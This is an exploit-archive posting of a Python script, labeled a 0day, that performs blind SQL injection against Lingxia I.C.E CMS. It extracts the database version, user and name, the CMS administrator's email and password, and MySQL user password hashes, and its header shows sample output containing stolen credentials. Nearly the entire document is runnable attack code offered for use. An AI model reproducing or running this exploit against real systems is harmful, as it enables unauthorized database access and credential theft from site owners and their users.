ExploitFixes
Lingxia I.C.E CMS Remote Blind SQL Injection Exploit 2011-02-15 11:15:08

#!/usr/bin/python
# ICE CMS Blind SQLi 0day.
# [[email protected] ice]$ python icecold.py -p localhost:8080 -t 10.3.100.25:8500 -d /ice/
#
# | ---------------------------------------------------- |
# | Lingxia I.C.E CMS Remote Blind SQL Injection Exploit |
# | by mr_me - net-ninja.net --------------------------- |
#
# (+) Exploiting target @: 10.3.100.25:8500/ice/
# (+) Testing Proxy @ localhost:8080..
# (+) Proxy is working!
# (+) Using string 'icon_media_remove.gif' for the true page
# (+) This will take time, go grab a coffee..
#
# (!) Getting database version: 5.5.9
# (!) Getting database user: [email protected]
# (!) Getting database name: ice
# (!) Getting ICE administrative account: [email protected]:pa$sw0rD
# (!) w00t! You have access to MySQL database!
# (+) Dumping hashs hold onto your knickers..
# (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
# (+) PoC finished.
#
# Note to Lingexa:
# Next time, acknowledge a kind email.

import sys, urllib, re
from optparse import OptionParser

# all possible decimal values of printable ascii characters
# 8 requests per char, much much cleaner.
lower_value = 0
upper_value = 126
#global truStr
trueStr = "icon_media_remove.gif"

vuluri = "media.cfm?session.current_site_id=1&session.user_id=99"
basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'}

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.2.15:8500 -d /amoeba/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
help="Directory path to the CMS")

(options, args) = parser.parse_args()

def banner():
print "\n\t| ---------------------------------------------------- |"
print "\t| Lingxia I.C.E CMS Remote Blind SQL Injection Exploit |"
print "\t| by mr_me - net-ninja.net --------------------------- |\n"

if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)

def setTargetHTTP():
if options.target[0:7] != 'http://':
options.target = "http://" + options.target
return options.target

def getProxy():
try:
proxy = {'http': "http://"+options.proxy}
opener = urllib.FancyURLopener(proxy)
except(socket.timeout):
print "\n(-) Proxy Timed Out"
sys.exit(1)
except(),msg:
print "\n(-) Proxy Failed"
sys.exit(1)
return opener

def getServerResponse(exploit):
if options.proxy:
try:
options.target = setTargetHTTP()
opener = getProxy()
check = opener.open(options.target+options.directory+exploit).read()
except urllib.error.HTTPError, error:
check = error.read()
except socket.error:
print "(-) Proxy connection failed"
sys.exit(1)
else:
try:
check = urllib.urlopen(options.target+options.directory+exploit).read()
except urllib.error.HTTPError, error:
check = error.read()
except urllib.error.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check

# modified version of rsauron's function
# thanks bro.
def getAsciiValue(URI):
lower = lower_value
upper = upper_value
while lower < upper:
try:
mid = (lower + upper) / 2
head_URI = URI + ">"+str(mid)+"+--"
result = getServerResponse(head_URI)
match = re.findall(trueStr,result)
if len(match) >= 1:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

if lower > lower_value and lower < upper_value:
value = lower
else:
head_URI = URI + "="+str(lower)
result = getServerResponse(head_URI)
match = re.findall(trueStr,result)
if len(match) >= 1:
value = lower
else:
print "(-) READ xprog's blind sql tutorial!\n"
sys.exit(1)
return value

def doBlindSqlInjection():
print "(+) Using string '%s' for the true page" % (trueStr)
print "(+) This will take time, go grab a coffee.."
for key in basicInfo:
sys.stdout.write("\n(!) Getting database %s: " % (key))
sys.stdout.flush()

# it will never go through all 100 iterations
for i in range(1,100):
request = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i)))
asciival = getAsciiValue(request)
if asciival != 0:
sys.stdout.write("%s" % (chr(asciival)))
sys.stdout.flush()
else:
break

sys.stdout.write("\n(!) Getting ICE administrative account: ")
sys.stdout.flush()
for i in range(1,100):
getUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat"
"(email,0x3a,pword)+from+ice.ice_user+limit+0,1),%s,1))" % str(i))

asciival = getAsciiValue(getUserAndPass)

if asciival != 0:
sys.stdout.write("%s" % (chr(asciival)))
sys.stdout.flush()
else:
pass

isMysqlUser = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+(select 1 from mysql.user limit 0,1)=1")
result = getServerResponse(isMysqlUser)
match = re.findall(trueStr,result)
if len(match) >= 1:
print "\n(!) w00t! You have access to MySQL database!"
print "(+) Dumping hashs hold onto your knickers.."
sys.stdout.write("(+) The username and hashed password is: ")
sys.stdout.flush()
for k in range(1,100):
getMysqlUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat"
"(user,0x3a,password)+from+mysql.user+limit+0,1),%s,1))" % str(k))
asciival = getAsciiValue(getMysqlUserAndPass)
if asciival != 0:
sys.stdout.write("%s" % (chr(asciival)))
sys.stdout.flush()
else:
break
else:
print "\n(-) You do not have access to MySQL database"

if __name__ == "__main__":
banner()
print "(+) Exploiting target @: %s" % (options.target+options.directory)
if options.proxy:
print "(+) Testing Proxy @ %s.." % (options.proxy)
opener = getProxy()
try:
check = opener.open("http://www.google.com").read()
except:
check = 0
pass
if check >= 1:
print "(+) Proxy is working!"

else:
print "(-) Proxy failed, exiting.."
sys.exit(1)

doBlindSqlInjection()
print "\n(+) PoC finished."